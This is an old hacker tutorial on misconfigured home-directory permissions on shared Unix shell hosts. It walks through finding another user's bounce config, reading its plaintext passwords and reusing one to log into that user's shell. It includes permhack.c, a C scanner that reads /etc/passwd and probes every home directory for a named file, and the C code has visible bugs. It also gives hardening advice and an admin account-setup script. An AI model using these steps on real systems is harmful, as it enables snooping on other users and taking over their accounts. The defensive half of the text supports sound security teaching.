___________ ____________ ____ __ ___ ______________
|\ ____ \ |\ ____ \ |\ \|\ \|\ \ |\_____ ____\
| \ \__|\ \ | \ \__|\ \ | \ \ \ \ \ \ | | |\ \ |
\ \ ___ | \ \ ____ \ \ \ \_| \_| \ \|___| \ \__|
\ \ \_|\ \_ \ \ \__|\ \ \ \ _ \ \ \ \
\ \ \\ \ \ \ \ \ \ \ \ \ \ |\ http://www.haxworx.com
\ \___\\ \___\ \ \___\ \ \___\ \ \____| \_____\ \ \___\
\ | | \ | | \ | | \ | | \ | |\ | | \ | |
\|___| \|___| \|___| \|___| \|___| \|____| \|___|
+-----------------------------------------------------------------------+
| Shell Misconfiguration Hacking (Understanding File Permissions) |
| Author: BrainRawt |
| Email: brainrawt@hotmail.com |
| Site: http://www.haxworx.com |
| Greetz to grep and b0iler. |
+-----------------------------------------------------------------------+
Updated on 5-11-02
NOTE: This text will talk about logging into a shell via telnet/ssh but
it must be known that with the proper cgi script, you can do all
this hacking via a web-browser as well.
A Word from BrainRawt.......
Many people will get a shell account and not understand the security
that is involved in using it. In my past experiences, I have found
many /home/username dirs that offer alot of information. Information
that Im sure they dont think is available to me. In this text we will
use a "bounce" as an example. Keep in mind that many things require
config files with passwds in them. :)
------------------------------------------
Whats the Problem?
------------------------------------------
Most /home/username dirs have the 755 permissions. This means that anyone
can read/execute from within the /home/username dir. I can understand a
user wanting these permissions on their "$HOME" dir if they are using their
public_html dir to offer a webpage to the public. If this is the case then
the user must take other precautions to allow access to the /home/username/public_html
without allowing access to everything else in the /home/username dir.
------------------------------------------
Why is This a Problem?
------------------------------------------
Lets say that we are logged into our shell and we have just performed a
"ps aux | grep bnc". This will search the system for running processes
and echo back to us any information it finds on "bnc".
[rawt@linux rawt]$ ps aux | grep bnc ( NOTE: we can grep for anything. )
lamah-joe 1059 0.0 0.2 1460 656 ? S Jun30 0:02 ./bnc
[rawt@linux rawt]$
Now we know that lamah-joe is running a ./bnc (bounce). Why do we care? We care
because most bounces require a password to be used. That password must be in a
config file for the bounce. :)
Now we check lamah-joes home dir for permissions.
[rawt@linux rawt]$ ls -alk /home | grep lamah-joe
drwxr-xr-x 8 lamah-joe lamah-joe 4096 Jun 29 01:28 lamah-joe
[rawt@linux rawt]$
-------------------------------------------
Understanding Permissions
-------------------------------------------
permission username groupname
drwxr-xr-x 8 lamah-joe lamah-joe 4096 Jun 29 01:28 lamah-joe
Breaking Down Permissions
The first rwx are the owner permssions
The second r-x are the group permissions
The third r-x are the "world" permissions.
So in our case above, we can see that lamah-joe can "read/write/execute", anyone in the
lamah-joe group can "read/execute", and everyone else can "read/execute".
Everyone else = we the hackers. :)
-------------------------------------------
Performing the Hack
-------------------------------------------
Thanks to the almighty read/execute permissions we have on this users "$HOME" dir, we
can just perform an "ls" in their home dir. HAHA LAME!
[rawt@linux /home]$ ls -alk /home/lamah-joe/
drwx------ 5 lamah-joe lamah-joe 4096 Jul 4 09:49 .
drwxrwsr-x 62 root staff 4096 Jun 30 00:00 ..
-rw-r--r-- 1 lamah-joe lamah-joe 266 Feb 19 16:53 .alias
-rw------- 1 lamah-joe lamah-joe 319 Jul 4 12:06 .bash_history
-rw-r--r-- 1 lamah-joe lamah-joe 134 Feb 19 16:53 .bash_logout
-rw-r--r-- 1 lamah-joe lamah-joe 409 Feb 19 16:53 .bash_profile
-rw-r--r-- 1 lamah-joe lamah-joe 509 Feb 19 16:53 .bashrc
-rw-r--r-- 1 lamah-joe lamah-joe 375 Feb 19 16:53 .cshrc
drwx------ 2 lamah-joe lamah-joe 4096 Jul 4 09:49 .ssh
-rw-r--r-- 1 lamah-joe lamah-joe 121323 Jun 19 04:46 nbtscan-1.0.2.tar.gz
-rw-r--r-- 1 lamah-joe lamah-joe 584385 Jun 19 04:42 nmap-2.53.tgz
drwx---r-x 5 lamah-joe lamah-joe 4096 Jun 23 22:57 nmap
drwxr-xr-x 5 lamah-joe lamah-joe 5132 Jun 27 06:19 bounce
[rawt@linux /home]$
-----------------------------------------------------------------------------------------------
What if the users home dir only allows me to execute and i cant view the contents in his/her
home dir? How am i going to find what i need? If this is the case then i suggest that you
either know exactly what you are looking for or you use the "locate" command. HINT: If the
/home/username only allows you execution and not read, it doesnt mean that the dirs inside the
/home/username have the same permissions.
-----------------------------------------------------------------------------------------------
We found that almighty wonderful "bounce" dir and it is world "read/execute" :). Now for the
configuration file within it.
[rawt@linux /home]$ ls -alk /home/lamah-joe/bounce/ | grep bnc.conf
-rw-r--r-- 1 lamah-joe lamah-joe 375 Feb 19 16:53 bnc.conf
[rawt@linux /home]$
How nice of lamah-joe to leave his bnc.conf file world readable. :) Lets get that bnc passwd. Now
we view this bnc.conf file with our favorite unix editor. In my case its "pico".
[rawt@linux /home]$ pico bnc.conf
Inside bnc.conf i found 2 lines.......
S:james123j Password for Supervisor Access
D:1337:5:6ji5hf ListenPort:MaxUsers:Password
Sometimes these passwds are encrypted. Dont worry. Its only DES.
You can decipher them with "John The Ripper".
--------------------------------------------
lamah-joe has been 0wn3d!
--------------------------------------------
What have i gained from this users lack of linux permission knowledge?
I have gained a free bounce on lamahshell.com.
I have checked further and discovered that lamah-joe uses the same pass
for his shell.
Soooooo!!!! What have i gained now?
A free bnc on lamah.com
and
A free shell on lamah.com
---------------------------------------------------------------
What Do We Do With This Information?
---------------------------------------------------------------
We could use this new found information for malicious reasons. We could
use his bounce and not tell him or maybe even hack from his shell. I suggest
that we fix all lamah-joes permissions and then tell him what has happened. This
is our way of spreading this knowledge to those that need to know. We had fun
exploring and lamah-joe learns a lesson.
---------------------------------------------------
How Do We Protect Ourselves Against This?
---------------------------------------------------
1. Study File Permissions, how to use them and what they mean.
2. Learn how to use "chmod". Type "man chmod" at a linux command prompt.
(chmod is used to set file permissions.)
3. I personally dont use the public_html in my shell accounts so i have a
tendency to "chmod 700 /home/myusername". This allows only myself
to enter my home dir.
4. Always use encrypted and nondictionary passwds when available. Some kiddies
may gain the ability to read your conf files but not all of them know how to
decipher encryption.
--------------------------------------------------------------------------
Here is a small "Exploit" to automate the searching of directories that
are vulnerable to improper file permissions.
--------------------------------------------------------------------------
------------ START COPY OF permhack.c ----------------
/*
*
* permhack.c By BrainRawt (Understanding The Importance Of File Permissions)
* Email: brainrawt@hotmail.com
* Site: http://rawt.daemon.sh
*
* Note: This source was coded as a proof of concept to those people that
* dont think file permissions are important. I know that this could
* have been done alot easier in perl or shell script but I was wanting
* to learn c so I thought that this would be a good start in my humble c beginning.
*
* The "passwd" path and the "/home/user" path may need modified for different
* hosts or dif distros of linux.
*
*
* usage: permhack
*
*
* Greetz to Soltan^Gris and Netstar for thier great help on this project.
*/
#include
#include
int main(int argc, char *argv[])
{
FILE *passwd_file, *username_file, *log_file, *checkfile,*fopen ();
int c, x,count;
char *output_file;
char * look4;
char buffer[256];
char buffer2[256];
if (argc != 3)
{
printf("usage: %s: \n", argv[0]);
exit(1);
}
passwd_file = fopen ( "/etc/passwd", "r");
if ( passwd_file == NULL )
printf("\nSHIT! /etc/passwd either isnt there or we just cant read it.\n\n");
else {
username_file = fopen ("usernames", "w");
if ( username_file == NULL )
printf("\nSHIT! Cant write my extracted usernames from /etc/passwd to ~/usernames?\n\n");
else {
int colon=0;
while ( ( c = getc( passwd_file)) != EOF )
{
if(c==58)
colon=1;
if(c==10)
colon=0;
if(colon==0)
putc (c, username_file);
}
fclose (username_file);
look4 = argv[1];
output_file = argv[2];
username_file = fopen ("usernames", "r");
if (username_file == NULL )
printf("\nCannot open usernames for reading\n\n");
else {
log_file = fopen (output_file, "w");
printf("looking for [%s] in the /home/user dirs and logging to [%s]\n\n", look4, output_file);
count =0;
while (( x = getc( username_file )) != EOF )
{
if ( x != '\n')
{
buffer2[count] = x;
count++;
}
if(x == '\n')
{
sprintf(buffer,"/home/",buffer);
sprintf(buffer,"%s%s/%s",buffer,buffer2,look4);
count =0;
checkfile = fopen(buffer,"r");
if(checkfile != NULL)
{
printf("Found - %s\n",buffer);
fprintf(log_file," %s\n",buffer);
fclose(checkfile);
}
memset(buffer2,0,sizeof(buffer2));
}
}
}
}
printf("\n");
fclose (passwd_file);
fclose (username_file);
fclose (log_file);
}
return (0);
}
------------- END COPY OF permhack.c -----------------
--------------------------------------------------------------------------
Here is a small shell script i wrote for an admin to use when creating
a new account. This will hopefully solve the problem discussed above.
--------------------------------------------------------------------------
------------ START COPY OF newuser-----------------
#!/bin/sh
#
# My very quick and simple ass way to solving the insecure
# permission problems for users on a shell. We will protect
# their data in /home/username/bin via 700 and still allow access
# to ~/public_html via 755 so the webspace can still be used. To protect
# from those snooping eyes that belong to other users on the system,
# we will chmod 711 the /home/username dir. This will stop anyone from
# viewing its contents. If you dont like this script then dont use it. :P
#
# - BrainRawt (http://rawt.daemon.sh) (brainrawt@hotmail.com)
echo "What is the username of the account you wish to create?"
read LUSER
echo "Now creating account for $LUSER"
useradd $LUSER
if [ -d /home/$LUSER ];
then
chmod 711 /home/$LUSER
mkdir /home/$LUSER/bin
mkdir /home/$LUSER/public_html
else
echo "Where is the /home/$LUSER dir?"
fi
if [ -d /home/$LUSER/bin ];
then
chmod 700 /home/$LUSER/bin
chown $LUSER:$LUSER /home/$LUSER/bin
else
echo" Where is the /home/$LUSER/bin die?"
fi
if [ -d /home/$LUSER/public_html ];
then
chmod 755 /home/$LUSER/public_html
chown $LUSER:$LUSER /home/$LUSER/public_html
else
echo "Where is the /home/$LUSER/public_html?"
fi
echo "Account for $LUSER has been successfully created."
passwd $LUSER
cat > /home/$LUSER/README <<- _EOF_
ATT: All users on this system can view any content
that you place in your /home/YOURNAME dir. Please be safe
and use your /home/YOURNAME/bin dir to store files that you
wish to keep private.
Thank You,
Administration
_EOF_
--------------- END COPY OF newuser-----------------
--------------------------------------------------------------------------
Which Looks Better? BlackHat or White? You Decide! - BrainRawt
(
geocities.com/eljehad1)